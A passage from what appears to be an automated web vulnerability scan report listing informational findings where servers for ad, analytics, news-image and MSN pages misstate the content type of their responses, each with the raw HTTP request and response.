Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: application/x-javascript
Accept-Ranges: bytes
ETag: "0dad772ed16cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
S: BLUMPPSTCA02
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Age: 3276073
Date: Tue, 26 Apr 2011 18:45:01 GMT
Last-Modified: Mon, 28 Jun 2010 18:12:20 GMT
Expires: Sun, 18 Mar 2012 20:43:48 GMT
Connection: keep-alive
Content-Length: 3987

........................................................................................................................................................................................................
...[SNIP]...

29.17. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=38733&rnd=388470.84529697895 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j2VdaGye07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 20:11:04 GMT
Connection: close
Content-Length: 103

ebReportingImg0 = new Image();
ebReportingImg0.src = 'http://ad.yieldmanager.com/pixel?id=962756&t=2';

29.18. http://freemanco.app5.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://freemanco.app5.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: freemanco.app5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 497
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=MtXOxR4jzQEkAAAAMDUzMzFjZDctNWUwZC00MWNiLWFkZTYtYTExNWI1YTJjNWQ10; expires=Wed, 25-Apr-2012 20:05:33 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=84c62207-a976-46ab-bd41-5aaf29a2d55f; domain=freemanco.app5.hubspot.com; expires=Mon, 26-Apr-2021 05:00:00 GMT; path=/; HttpOnly
Date: Tue, 26 Apr 2011 20:05:33 GMT
Set-Cookie: HUBSPOT159=219223212.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 28466;
var hsWeekEndsIn = 460466;
var hsMonthEndsIn = 374066;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-04-26 16:05:
...[SNIP]...

29.19. http://images.west.thomson.com/buttons/tr_logo_small.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://images.west.thomson.com
Path:   /buttons/tr_logo_small.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /buttons/tr_logo_small.jpg HTTP/1.1
Host: images.west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 3262
Content-Type: image/jpeg
Last-Modified: Thu, 17 Apr 2008 16:19:15 GMT
Accept-Ranges: bytes
ETag: "80835fc7a6a0c81:6b9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:03:00 GMT

GIF89a..P............j............\][..........{2........................STRllk..........................J........{{|{..S............ab`...rsq..Y.....s..............f........D..J..3..=.....=.....C....
...[SNIP]...

29.20. http://img.icbdr.com/MediaManagement/3J/Mwg7SF78N5DWGML7B3J.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.icbdr.com
Path:   /MediaManagement/3J/Mwg7SF78N5DWGML7B3J.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /MediaManagement/3J/Mwg7SF78N5DWGML7B3J.jpg HTTP/1.1
Host: img.icbdr.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Tue, 31 Aug 2010 14:35:52 GMT
Accept-Ranges: bytes
ETag: "6a2142d01949cb1:0"
Server: Microsoft-IIS/7.0
X-PBY: REBELIMGA
Content-Length: 1865
Cache-Control: max-age=36741
Date: Tue, 26 Apr 2011 18:40:48 GMT
Connection: close

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................<....
...[SNIP]...

29.21. http://img.icbdr.com/MediaManagement/91/MVM8635VX05HXYWXW91.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.icbdr.com
Path:   /MediaManagement/91/MVM8635VX05HXYWXW91.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /MediaManagement/91/MVM8635VX05HXYWXW91.jpg HTTP/1.1
Host: img.icbdr.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Mon, 07 Mar 2011 11:42:14 GMT
Accept-Ranges: bytes
ETag: "6f93fcb3bcdccb1:0"
Server: Microsoft-IIS/7.0
X-PBY: REBELIMGA
Content-Length: 9189
Cache-Control: max-age=18496
Date: Tue, 26 Apr 2011 18:39:45 GMT
Connection: close

......Exif..II*.................Ducky.......d.....XICC_PROFILE......HLino....mntrRGB XYZ .....    ...1..acspMSFT....IEC sRGB.......................-HP ................................................cpr
...[SNIP]...

29.22. http://img.icbdr.com/images/custom/msn/Calculator2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.icbdr.com
Path:   /images/custom/msn/Calculator2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /images/custom/msn/Calculator2.jpg HTTP/1.1
Host: img.icbdr.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Mon, 25 Apr 2011 16:49:29 GMT
Accept-Ranges: bytes
ETag: "27fa7bbe683cc1:0"
Server: Microsoft-IIS/7.0
X-PBY: REBELIMGA
Content-Length: 19879
Cache-Control: max-age=29611
Date: Tue, 26 Apr 2011 18:39:44 GMT
Connection: close

......JFIF.....d.d......Ducky.......H......Adobe.d......................................    ......        .....    .............................        ............................................................x....
...[SNIP]...

29.23. http://img.icbdr.com/images/custom/msn/Socialmediaoverload.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.icbdr.com
Path:   /images/custom/msn/Socialmediaoverload.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /images/custom/msn/Socialmediaoverload.jpg HTTP/1.1
Host: img.icbdr.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Mon, 25 Apr 2011 17:03:54 GMT
Accept-Ranges: bytes
ETag: "6f18bc26a3cc1:0"
Server: Microsoft-IIS/7.0
X-PBY: REBELIMGB
Content-Length: 36901
Cache-Control: max-age=29611
Date: Tue, 26 Apr 2011 18:39:44 GMT
Connection: close

......JFIF.....`.`......Exif..MM.*.....    .....................................1...........2..........GF..........GI.......c...i.....................z....................................................
...[SNIP]...

29.24. http://img.icbdr.com/images/custom/msn/words.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.icbdr.com
Path:   /images/custom/msn/words.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /images/custom/msn/words.jpg HTTP/1.1
Host: img.icbdr.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Mon, 04 Apr 2011 14:33:38 GMT
Accept-Ranges: bytes
ETag: "ec8b9849d5f2cb1:0"
Server: Microsoft-IIS/7.0
X-PBY: BEARIMGA
Content-Length: 27447
Cache-Control: max-age=10976
Date: Tue, 26 Apr 2011 18:39:45 GMT
Connection: close

......JFIF.....,.,......Exif..II*.....    .........z...................................................(...........1...........2...........i...............Canon.Canon EOS 5D Mark II...-..'....-..'..Adobe
...[SNIP]...

29.25. http://img1.newser.com/image/106040-0-20080520120727.jpeg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img1.newser.com
Path:   /image/106040-0-20080520120727.jpeg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /image/106040-0-20080520120727.jpeg HTTP/1.1
Host: img1.newser.com
Proxy-Connection: keep-alive
Referer: http://widgets.newser.com/flash/newser-300x250_popup.swf?refid=wid_wb_default&wbx_framerate=30&wbx_stageHeight=250&wbx_stageWidth=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/jpeg
Expires: Mon, 26 Apr 2021 16:46:41 GMT
Last-Modified: Tue, 26 Apr 2011 16:46:41
Set-Cookie: ASP.NET_SessionId=y4j5xkhf5dsic4pzkwq0doov; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:46:41 GMT
Content-Length: 126

GIF89a...............................!.......,..........CX!R...1X.K.ve...
..p..MUA......y.......... .....h.,lB.E..7..,jMZ.    .;

29.26. http://img1.newser.com/image/5830-0-20070530122616.jpeg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img1.newser.com
Path:   /image/5830-0-20070530122616.jpeg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /image/5830-0-20070530122616.jpeg HTTP/1.1
Host: img1.newser.com
Proxy-Connection: keep-alive
Referer: http://widgets.newser.com/flash/newser-300x250_popup.swf?refid=wid_wb_default&wbx_framerate=30&wbx_stageHeight=250&wbx_stageWidth=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/jpeg
Expires: Mon, 26 Apr 2021 16:46:40 GMT
Last-Modified: Tue, 26 Apr 2011 16:46:40
Set-Cookie: ASP.NET_SessionId=s1nzfx43ccq0vrqd3qvvo2xg; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:46:40 GMT
Content-Length: 86

GIF89a.............!.......,..........-L..h...l.4u.5.i.}    ...guj..'..p.r..m...W..Hr...;

29.27. http://img1.newser.com/image/6028-0-20070530123754.jpeg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img1.newser.com
Path:   /image/6028-0-20070530123754.jpeg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /image/6028-0-20070530123754.jpeg HTTP/1.1
Host: img1.newser.com
Proxy-Connection: keep-alive
Referer: http://widgets.newser.com/flash/newser-300x250_popup.swf?refid=wid_wb_default&wbx_framerate=30&wbx_stageHeight=250&wbx_stageWidth=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/jpeg
Expires: Mon, 26 Apr 2021 16:46:28 GMT
Last-Modified: Tue, 26 Apr 2011 16:46:28
Set-Cookie: ASP.NET_SessionId=nfhwyvrjbk4nxozldfsvvxvj; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:46:27 GMT
Content-Length: 224

GIF89a................///???OOO___ooo.....................................................................!.......,..........] $.di..s...@.q.@m.'Q .M.
...H....c.. .(... 8..%`.....d...>..Fm1 4......
...[SNIP]...

29.28. http://img1.newser.com/image/94280-0-20080414104938.jpeg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img1.newser.com
Path:   /image/94280-0-20080414104938.jpeg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a BMP image.

Request

GET /image/94280-0-20080414104938.jpeg HTTP/1.1
Host: img1.newser.com
Proxy-Connection: keep-alive
Referer: http://widgets.newser.com/flash/newser-300x250_popup.swf?refid=wid_wb_default&wbx_framerate=30&wbx_stageHeight=250&wbx_stageWidth=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/jpeg
Expires: Mon, 26 Apr 2021 16:46:41 GMT
Last-Modified: Tue, 26 Apr 2011 16:46:41
Set-Cookie: ASP.NET_SessionId=vwuqxgl04fydchnibxluwnwg; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:46:41 GMT
Content-Length: 824

BM8.......6...(........................................w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..f3.f3.f3.f3.f3.f3.f3.f3.f3.f3.f3.f3.f3.f3.w..w..f3.f3.f3...................f3.f3.f3.f3.f3.w..w
...[SNIP]...

29.29. http://img2.newser.com/image/6211-0-20070530125015.jpeg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img2.newser.com
Path:   /image/6211-0-20070530125015.jpeg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /image/6211-0-20070530125015.jpeg HTTP/1.1
Host: img2.newser.com
Proxy-Connection: keep-alive
Referer: http://widgets.newser.com/flash/newser-300x250_popup.swf?refid=wid_wb_default&wbx_framerate=30&wbx_stageHeight=250&wbx_stageWidth=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/jpeg
Expires: Mon, 26 Apr 2021 16:46:40 GMT
Last-Modified: Tue, 26 Apr 2011 16:46:40
Set-Cookie: ASP.NET_SessionId=ayp3uap1d2oaw2s0zutte1fm; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:46:40 GMT
Content-Length: 130

GIF89a...............................!.......,..........G8...bI..uS.j.l[.y...A9.B.@..E+6.)...._.U...-Z...xL...`-..JZ.Gf..m...x...;

29.30. http://investing.money.msn.com/mv/MarketStatus  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://investing.money.msn.com
Path:   /mv/MarketStatus

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/MarketStatus?callback=jsonp1303842964756 HTTP/1.1
Host: investing.money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=qtcbphyki2rnbv0xa2merdxm; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:10 GMT
Content-Length: 46

jsonp1303842964756(["U.S. markets open",5029])

29.31. http://investing.money.msn.com/mv/RecentQuotes/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://investing.money.msn.com
Path:   /mv/RecentQuotes/

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/RecentQuotes/?callback=jsonp1303842964755 HTTP/1.1
Host: investing.money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=pszolkzh5jrq42kxaxko401o; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:59 GMT
Content-Length: 24

jsonp1303842964755([""])

29.32. http://kbportal.thomson.com/display/2/homepage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/homepage.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /display/2/homepage.aspx HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_midframe.aspx?tab=search&aid=&searchstring=&searchtype=&searchby=&alp=&search=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419burp; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=%5B%5BB%5D%5D; s_ppv=100; ASP.NET_SessionId=wmip5h2o1slpk445xan1ev45; BIGipServerKB-80=2240234663.20480.0000; LangCode=en-US; LangId=1; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 270

<font size="2" face="Verdana">
<p>We are sorry, however you have reached our default knowledgebase in error.</P>
<br>
<p>Please try your link again or contact your product team to help you with the
...[SNIP]...

29.33. http://lifestyle.msn.com/FeedPageFinal.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://lifestyle.msn.com
Path:   /FeedPageFinal.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /FeedPageFinal.aspx?page=http://realestate.msn.com HTTP/1.1
Host: lifestyle.msn.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 1498
Content-Length: 1498

var cntwJsonfeed='<div class="cnw"><div class="cnwhead">Must-See on MSN</div><div class="cnwbx"><a href="http://editorial.autos.msn.com/listarticle.aspx?cp-documentid=1183915&amp;icid=autos_1809&amp;G
...[SNIP]...

29.34. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fmatrix.itasoftware.com%2F&callback=_xdc_._rjf7ns&token=27263 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 26 Apr 2011 19:57:01 GMT
Server: mafe
Cache-Control: private
